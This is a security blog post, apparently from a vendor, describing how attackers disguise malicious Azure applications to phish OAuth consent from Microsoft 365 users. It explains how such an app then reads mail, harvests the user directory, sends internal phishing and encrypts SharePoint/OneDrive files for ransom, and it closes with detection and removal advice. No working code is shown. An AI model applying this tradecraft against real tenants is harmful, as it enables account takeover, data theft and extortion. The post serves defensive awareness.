Using malware in Azure to gain access to Microsoft 365 tenants



Phishing remains one of the most successful ways to infiltrate an organization. We have seen a huge number of malware infections arising from users opening infected attachments or following links to malicious sites that tried to compromise vulnerable browsers or plugins.

Now that organizations are moving to Microsoft 365 at such a fast pace, we are seeing a new attack vector - Azure applications .

As you will see below, cybercriminals can create, mask and deploy malicious Azure applications for use in their phishing campaigns. Azure applications do not require approval from Microsoft and, more importantly, they do not require code execution on the user's computer, which makes it easy to bypass detection tools and antivirus programs on workstations.

After the attacker convinces the victim to install the malicious Azure application, he will be able to find out which organization the victim belongs to, access the victim’s files, read her emails, send emails on behalf of the victim (great for an internal phishing attack) and in general a lot more.

What are Azure apps?


Microsoft created the Azure Application Service to enable users to create their own cloud-based applications that can call and use Azure APIs and resources. This makes it easy to create powerful custom programs that integrate with the Microsoft 365 ecosystem.

One of the most common APIs in Azure is the MS Graph API . This API allows applications to interact with the user's environment, namely: users, groups, OneDrive documents, Exchange Online mailboxes and chats.



Just as your iOS phone will ask you if the application can be allowed access to your contacts or location, Azure will ask you to give the application access to the necessary resources. Obviously, an attacker can use this opportunity to fraudulently give an application access to one or more confidential cloud resources.

How is the attack


To perform this attack, the attacker must have the web application itself and the Azure tenant to host it. After setting up the store, we can start a phishing campaign using the link to install the Azure application: The



link in the email directs the user to a website controlled by attackers (for example, myapp.malicious.com ), which, in turn, redirects the victim to the Microsoft login page . The authentication process is fully handled by Microsoft, so using multi-factor authentication is not a solution.

As soon as the user enters his O365 instance, a token will be created for the malicious application, and the user will be asked to log in and provide the application with the necessary permissions. Here's what it looks like for the end user (and it should look very familiar if the user previously installed the application in SharePoint or Teams):



Here are the MS Graph API permissions that are requested by the attacker in the code of our application:



As you can see, the attacker controls the name of the application ("MicrosoftOffice" ) and shortcut (we used the OneNote shortcut). The URL is a valid Microsoft URL, the certificate is also valid.

However, the name of the tenant of the attacker and a warning message are indicated under the application name, and neither one nor the other can be hidden. The hope of the attacker is that the user will be in a hurry, see a familiar shortcut and skip this information as quickly and thoughtlessly as notifications of terms of use.

By clicking "Accept", the victim grants our application permissions on behalf of his account, that is, the application will be able to read the victim's emails and gain access to any files that the victim has access to.

This step is the only one requiring the consent of the victim, from now on the attacker has full control over the user account and resources .

After giving consent to the application, the victim will be redirected to the website of our choice. Comparing recent user access to files and redirecting them to one of the recently opened internal SharePoint documents can be a good trick to arouse a minimum of suspicion.

Opportunities Received


This attack is ideal for the following activities:

  • Intelligence (getting a list of accounts, groups, objects in user tenant);
  • Internal phishing
  • Theft of data from file resources and email.

To illustrate the power of our Azure application, we created a funny console to display resources that we accessed as part of our PoC (proof of concept) test: the



“Me” section shows the details of the victim: the



“Users” section will show us the above metadata for each An individual user in an organization, including an email address, mobile phone number, job title, and more, depending on the attributes of the organization’s Active Directory. This API call alone can cause a massive violation of personal data protection policies, especially within the framework of GDPR and CCPA.



Calendar Sectionshows us the events of the victim’s calendar. We can also schedule appointments on her behalf, view existing meetings, and even delete future meetings.

Perhaps the most important section in our console application is the RecentFiles section , which allows us to see any file that the user has accessed in OneDrive or SharePoint. We can also upload or modify files (including files with malicious macros to develop an attack).



IMPORTANT: when we access the file through this API, Azure creates a unique link. This link is accessible to anyone from anywhere, even if the organization does not allow anonymous exchange of links for ordinary 365 users.
API links are special. Frankly speaking, we are not sure why they are not blocked by the organization’s policy for link exchange; perhaps Microsoft does not want to break existing user applications if the policy changes. The application may request a download link or a link to modify the file - in our PoC we requested both.

The “Outlook” section gives us full access to the victim’s email. We can see the recipients of any message, filter them by priority, send emails (internal phishing) and much more.



By reading the victim's emails, we can identify the circle of her communications and the most vulnerable contacts from this circle, send internal phishing emails on behalf of our victim and thus develop an attack within the organization. We can also use the victim’s email address and contacts from her circle to filter out the data that we find in 365.

Moreover, Microsoft has an API that provides information about the victim’s current communication circle:



As we mentioned above, we can modify user files subject to relevant rights. But what if we use the API to modify files?



One option is to turn our malicious Azure application into a ransomware program that remotely encrypts files that the victim has access to modify on SharePoint and OneDrive:



Nevertheless, this method of encrypting files is not reliable (since some files can be restored using more strict backup settings), but tenants with default configurations risk losing data permanently. On the other hand, we can always bring out confidential data and threaten to publish it, unless we get a ransom.

Other sources:

  • Kevin Mitnik introduced a similar cloud-based encryption method that applies to mailboxes;
  • Krebs On Security also wrote a good post about such an attack on his blog.

Urgency of the problem


Awareness of this phishing technique is relatively low today. Many experts do not understand the potential level of damage that an attacker can inflict due to only one employee in the organization that provided access to the malicious Azure application. Giving consent to an Azure application is not much different from running a malicious .exe file or allowing macros to be activated in a document from an unknown sender. But, since this is a newer vector that does not require code to be executed on the user's machine, it is more difficult to detect and block.

How about disabling all third-party applications?


Microsoft does not recommend setting a ban on users to grant permissions to applications:
“You can disable integrated applications for your tenant. This is a radical step that globally deprives end users of the ability to provide consent at the tenant level. This prevents your users from inadvertently granting access to a malicious application. This is not a strong recommendation, as it seriously impairs the ability of your users to work with third-party applications. ”

How can I detect abuse of Azure apps?


The easiest way to detect illegal permissions is to track access events in Azure AD and regularly review your Enterprise Applications in the Azure portal.

Always ask yourself questions:

  • Do I know this app?
  • Does it belong to an organization that I know?

For Varonis customers: the DatAlert module has threat models that detect malicious permissions. It is also possible to create your own Azure app sharing notification rules.

How to remove malicious applications?


In the Azure portal, go to the "Enterprise Applications" section of the "Azure Active Directory" tab and uninstall the applications. An ordinary user can delete the permissions granted earlier by going to myapps.microsoft.com , checking the applications listed there and revoking the permissions as necessary.

See Microsoft's official guidelines for detailed instructions .

All Articles